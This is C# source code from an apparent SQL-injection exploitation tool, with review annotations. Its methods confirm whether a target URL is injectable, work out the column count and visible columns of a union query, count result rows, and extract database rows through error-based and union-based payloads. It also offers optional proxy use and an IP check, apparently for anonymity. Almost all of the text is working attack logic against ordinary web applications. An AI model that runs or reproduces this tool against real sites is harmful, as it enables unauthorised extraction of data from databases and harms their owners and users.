        /// <summary>
        /// Runs the configured custom-query payload once and returns the single answer extracted from
        /// the response page; for a multi-row payload this is the row at <paramref name="startingFrom"/>.
        /// </summary>
        /// <param name="startingFrom">Row offset substituted into the DBMS-specific single-result limiter
        /// when <c>PayloadDetails.ExpectedResultType</c> is <c>Multiple</c>; ignored otherwise.</param>
        /// <returns>The extracted answer, or an empty string when nothing could be extracted.</returns>
        public string GetSingleCustomQueryResultRow(int startingFrom)
        {
            string result = string.Empty;

            // NOTE(review): PayloadDetails and ExploitDetails are dereferenced here without a null check,
            // while the mapping-file call at the end does guard ExploitDetails; behaviour on a missing
            // configuration is a NullReferenceException.
            string generatedPayload = PayloadDetails.Payload;

            // Replace each "{position}" placeholder with the resolved parameter value. The string returned
            // by PayloadHelpers.GetData is spliced in verbatim; nothing is encoded at this point.
            if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
                }
            }

            // A multi-row payload is wrapped in the per-DBMS limiter so that only row startingFrom comes back.
            if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
            {
                generatedPayload = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms),
                                                 generatedPayload, startingFrom);
            }

            string query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedPayload);
            // pageHtml is untrusted remote content; everything derived from it below is untrusted as well.
            string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);

            result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
            //@TODO: strip scripts
            // NOTE(review): the extracted value is written to the mapping file as-is; the script stripping
            // mentioned in the TODO above has not happened by this point.
            if (!string.IsNullOrEmpty(MappingFile) && !string.IsNullOrEmpty(result))
            {
                XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, result, this,
                                             (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
            }

            return(result);
        }
        /// <summary>
        /// Sends the error-based identifier payload and reports whether the page echoed back the
        /// expected confirmation value.
        /// </summary>
        /// <returns>
        /// <c>true</c> only when the answer extracted from the page is non-empty and equals
        /// <c>GeneralPayloads.ErrorBasedVictimConfirmationResult</c>.
        /// </returns>
        public bool TestIfVulnerable()
        {
            string probeQuery = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, GeneralPayloads.ErrorBasedVictimIdentifier);
            string html       = QueryRunner.GetPageHtml(probeQuery, UseProxy ? ProxyDetails : null);

            // The answer is lifted from remote, untrusted page content; it is only compared, never interpreted.
            string answer = HtmlHelpers.GetAnswerFromHtml(html, probeQuery, ExploitDetails, DetailedExceptions);

            if (string.IsNullOrEmpty(answer))
            {
                return(false);
            }

            return(string.Equals(answer, GeneralPayloads.ErrorBasedVictimConfirmationResult));
        }
        /// <summary>
        /// Asks the target how many rows the configured custom query yields, by wrapping the generated
        /// payload in <c>GeneralPayloads.QueryResultCount</c> and parsing the answer from the page.
        /// </summary>
        /// <returns>
        /// 0 when no payload is configured, 1 for a single-result payload, otherwise the integer parsed
        /// from the page answer (0 when that answer does not parse as an int).
        /// </returns>
        public int GetTotalNoOfCustomQueryResultRows()
        {
            // Nothing to count without a payload.
            if (PayloadDetails == null || string.IsNullOrEmpty(PayloadDetails.Payload))
            {
                return(0);
            }

            // A single-result payload is one row by definition; no round trip needed.
            if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
            {
                return(1);
            }

            string payload = PayloadDetails.Payload;

            // "{position}" placeholders are replaced verbatim with the resolved parameter values.
            if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
            {
                foreach (var p in PayloadDetails.Params)
                {
                    payload = payload.Replace("{" + p.Position + "}", PayloadHelpers.GetData(p.Name, this));
                }
            }

            // A UrlHelpers.HexEncodeValue wrapper around this call was commented out in the original;
            // the count payload is sent without hex encoding.
            payload = string.Format(GeneralPayloads.QueryResultCount, payload);

            string countQuery = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, payload);
            // Untrusted remote content: only the parsed integer is used from it.
            string html       = QueryRunner.GetPageHtml(countQuery, UseProxy ? ProxyDetails : null);
            string answer     = HtmlHelpers.GetAnswerFromHtml(html, countQuery, ExploitDetails, DetailedExceptions);

            int rowCount;
            // TryParse leaves rowCount at 0 when the answer is not an integer, which is reported as "no rows".
            int.TryParse(answer, out rowCount);

            return(rowCount);
        }
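        /// <summary>
        /// Fetches the configured IP-checker page (through the proxy when <c>UseProxy</c> is set) and
        /// extracts the IP address from it.
        /// </summary>
        /// <param name="error">Receives a message when the page could not be fetched or when the checker
        /// configuration (<c>_details</c>) is missing. <c>GetAnswerFromHtml</c> also receives it by reference
        /// and may set it; that method is not visible here.</param>
        /// <returns>The extracted IP, or an empty string when it could not be determined.</returns>
        public string GetIp(ref string error)
        {
            string result   = string.Empty;
            string pageHtml = string.Empty;

            if (_details != null)
            {//@TODO: run this in a thread
                try
                {
                    pageHtml = QueryRunner.GetPageHtml(_details.Url, UseProxy ? ProxyDetails : null);
                }
                catch (Exception)
                {
                    // The exception is intentionally not surfaced (the original bound it to an unused
                    // variable); the caller only gets the message placed in error.
                    error = "Can not obtain IP, error from ip obtainer website or erroneous bounds defined in configuration file";
                }
                // Runs even after a failed fetch, with pageHtml still empty.
                result = GetAnswerFromHtml(pageHtml, ref error);
            }
            else
            {
                error = "Can not obtain IP, missing or erroneous configuration(ipcheckers.xml)";
            }

            return(result);
        }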
        /// <summary>
        /// Union-based variant of the single-row fetch: every visible union column carries the generated
        /// payload (offset by its column position from <paramref name="startingFrom"/>), the response is
        /// split into "&lt;column index&gt;&lt;separator&gt;&lt;value&gt;" answers, and the de-duplicated
        /// values are returned one per line.
        /// </summary>
        /// <param name="startingFrom">Row offset for column 0; column j is asked for row startingFrom + j
        /// when <c>PayloadDetails.ExpectedResultType</c> is <c>Multiple</c>.</param>
        /// <returns>The extracted values joined with <c>Environment.NewLine</c>; empty when nothing matched.</returns>
        public string GetSingleCustomQueryResultRow(int startingFrom)
        {
            // results is never read; sbResult holds the output.
            string        results  = string.Empty;
            StringBuilder sbResult = new StringBuilder();

            string generatedPayload = PayloadDetails.Payload;

            // Replace each "{position}" placeholder with the resolved parameter value, spliced in verbatim.
            if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
                }
            }


            StringBuilder sbCurExploit = new StringBuilder();

            int    columnIndexCounter        = 0;
            // Only assigned for Multiple payloads; stays empty otherwise and is then never used.
            string generatedPayloadWithLimit = string.Empty;

            // Build one union column per known column: visible columns get the tagged payload,
            // the others their index literal.
            for (int j = 0; j < _nrCols; j++)
            {
                if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
                {
                    generatedPayloadWithLimit = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms), generatedPayload, startingFrom + j);
                }

                if (_visibleColumnIndexes.Contains(j))
                {
                    /*
                     * sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapper, _visibleColumnIndexes[columnIndexCounter],
                     *  (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple) ? generatedPayloadWithLimit : generatedPayload);
                     */

                    // NOTE(review): the tag is taken from _visibleColumnIndexes[columnIndexCounter], which only
                    // equals j when the list is in ascending order — confirm how TestIfVulnerable fills it.
                    // Only the tag part (Part2) is hex encoded; the payload itself (Part3) is not.
                    sbCurExploit.Append(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart1);
                    sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart2,
                                                                                _visibleColumnIndexes[columnIndexCounter])));
                    sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart3,
                                              (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple) ? generatedPayloadWithLimit : generatedPayload);

                    columnIndexCounter++;
                }
                else
                {
                    // AppendFormat with no arguments; the index literal contains no braces, so it is appended as-is.
                    sbCurExploit.AppendFormat(j.ToString());
                }

                if (j < _nrCols - 1)
                {
                    sbCurExploit.Append(",");
                }
            }


            string         query        = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
            // pageHtml and everything parsed out of it below is untrusted remote content.
            string         pageHtml     = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
            IList <string> resultsBatch = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            string      actualValue       = string.Empty;
            int         separatorIndex    = 0;
            int         columnIndex       = 0;
            string      columnIndexString = "";
            // Column indexes already seen; each column contributes at most one value.
            IList <int> columnsProcessed  = new List <int>();

            foreach (string singleResult in resultsBatch)
            {
                //@TODO: strip scripts
                // Answers without the separator, or with a non-numeric column tag, are skipped.
                separatorIndex = singleResult.IndexOf(GeneralPayloads.UnionBasedResultSeparator);
                if (separatorIndex != -1)
                {
                    columnIndexString = singleResult.Substring(0, separatorIndex);
                    if (!int.TryParse(columnIndexString, out columnIndex))
                    {
                        continue;
                    }

                    if (columnsProcessed.Contains(columnIndex))
                    {
                        continue;
                    }
                    else
                    {
                        columnsProcessed.Add(columnIndex);
                    }

                    actualValue = singleResult.Substring(separatorIndex + GeneralPayloads.UnionBasedResultSeparator.Length);

                    // NOTE(review): the page-derived value is persisted as-is (the TODO above is not done yet),
                    // and — unlike the error-based variant — even when actualValue is empty.
                    if (!string.IsNullOrEmpty(MappingFile))
                    {
                        XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, actualValue, this,
                                                     (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
                    }

                    sbResult.Append(actualValue);
                    sbResult.Append(Environment.NewLine);
                }

                // Stop once every visible column has produced a value.
                if (columnsProcessed.Count == _visibleColumnIndexes.Count)
                {
                    break;
                }
            }
            return(sbResult.ToString());
        }
        /// <summary>
        /// Union-based row count for the configured custom query: the count wrapper is placed in the
        /// first union column and the remaining columns are padded with their index literal.
        /// </summary>
        /// <returns>
        /// 0 when no payload is configured, 1 for a single-result payload, otherwise the integer parsed
        /// from the page answer (0 when that answer does not parse as an int).
        /// </returns>
        /// <exception cref="SqlInjException">
        /// Thrown when the column layout is not known yet and <c>TestIfVulnerable()</c> returns <c>false</c>.
        /// </exception>
        public int GetTotalNoOfCustomQueryResultRows()
        {
            // Column layout not established yet — run the vulnerability test first. Presumably it fills
            // _nrCols / _nrVisibleCols / _visibleColumnIndexes as a side effect; confirm against TestIfVulnerable.
            if (_nrCols == 0 || _nrVisibleCols == 0 || _visibleColumnIndexes.Count() == 0)
            {
                if (!TestIfVulnerable())
                {
                    throw new SqlInjException("Given script is not injectable using current injection strategy");
                }
            }

            int    count            = 0;
            string generatedpayload = string.Empty;

            // Nothing to count without a payload.
            if (PayloadDetails == null)
            {
                return(0);
            }

            if (string.IsNullOrEmpty(PayloadDetails.Payload))
            {
                return(0);
            }

            // A single-result payload is one row by definition; no round trip needed.
            if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
            {
                return(1);
            }

            generatedpayload = PayloadDetails.Payload;

            // "{position}" placeholders are replaced verbatim with the resolved parameter values.
            if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    generatedpayload = generatedpayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
                }
            }

            generatedpayload = string.Format(GeneralPayloads.QueryResultCount, generatedpayload);

            StringBuilder sbCurExploit = new StringBuilder();

            // Column 0 carries the wrapped count query; no hex encoding is applied here.
            sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectResultWrapper, generatedpayload);

            if (_nrCols > 1)
            {
                sbCurExploit.Append(",");
            }

            // Columns 1.._nrCols-1 are padded with their index literal.
            for (int j = 1; j < _nrCols; j++)
            {
                sbCurExploit.Append(j.ToString());
                if (j < _nrCols - 1)
                {
                    sbCurExploit.Append(",");
                }
            }

            string query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
            // Untrusted remote content; only the parsed integer is used from it.
            string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);

            var result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            // TryParse leaves count at 0 when the answer is not an integer, which is reported as "no rows".
            int.TryParse(result, out count);
            return(count);
        }
        /// <summary>
        /// Probes for a union-based injection point by growing the SELECT column list one column at a
        /// time (up to <c>_maxCols</c>) until the union error message disappears, then records which
        /// columns are echoed back into the page.
        /// </summary>
        /// <returns>
        /// <c>true</c> when the union succeeded with at least two columns and at least one of them is
        /// visible in the response; <c>false</c> otherwise. A success on the very first probe (i == 0)
        /// is reported as <c>false</c>.
        /// </returns>
        /// <exception cref="Exception">Thrown when <c>Url</c> is empty.</exception>
        /// <remarks>
        /// Side effects on success: sets <c>_nrCols</c>, <c>_visibleColumnIndexes</c> and <c>_nrVisibleCols</c>,
        /// and writes them to the mapping file when one is configured.
        /// </remarks>
        public bool TestIfVulnerable()
        {
            bool result = false;

            StringBuilder sbCurExploit = new StringBuilder();
            string        query        = string.Empty;
            string        pageHtml     = string.Empty;

            if (string.IsNullOrEmpty(Url))
            {
                // NOTE(review): a bare Exception, whereas the row-count method on this page throws SqlInjException.
                throw new Exception("No url provided so cannot test vulnerability");
            }

            for (int i = 0; i < _maxCols; i++)
            {
                if (i > 0)
                {
                    sbCurExploit.Append(",");
                }
                //sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectValue,i);
                // Each probe column is hex encoded before being appended.
                sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectValue, i)));
                //ExploitDetails - check if null because it breaks
                query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
                // pageHtml is untrusted remote content.
                pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
                // Still the wrong column count: the union error is present and no test value was echoed.
                if (pageHtml.Contains(GeneralPayloads.UnionBasedErrorMessage) && !pageHtml.Contains(GeneralPayloads.UnionBasedTestValue))
                {
                    continue;
                }
                else
                {
                    if (i > 0)
                    {
                        _nrCols = i + 1;

                        var stringResults = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
                        // NOTE(review): int.Parse on text lifted from the response page — a non-numeric echo
                        // throws FormatException here instead of being skipped; TryParse would be the defensive choice.
                        _visibleColumnIndexes = stringResults.Where(r => !string.IsNullOrEmpty(r)).Distinct().Select(r => int.Parse(r)).ToList();
                        _nrVisibleCols        = _visibleColumnIndexes.Count();

                        if (_nrVisibleCols > 0)
                        {
                            #region write to mapping file
                            if (!string.IsNullOrEmpty(MappingFile))
                            {
                                XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/originalquery", _nrCols.ToString(),
                                                                         this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
                                XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/resultinghtml",
                                                                         _nrVisibleCols.ToString(), this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
                                XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/indexes",
                                                                         ListHelpers.ListToCommaSeparatedValues(_visibleColumnIndexes),
                                                                         this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
                            }
                            #endregion write to mapping file

                            result = true;
                        }
                        else
                        {
                            // Union accepted but nothing echoed: nothing can be read back, so not usable.
                            result = false;
                            break;
                        }
                    }
                    else
                    {
                        // The i == 0 case is treated as not vulnerable.
                        result = false;
                    }

                    break;
                }
            }

            return(result);
        }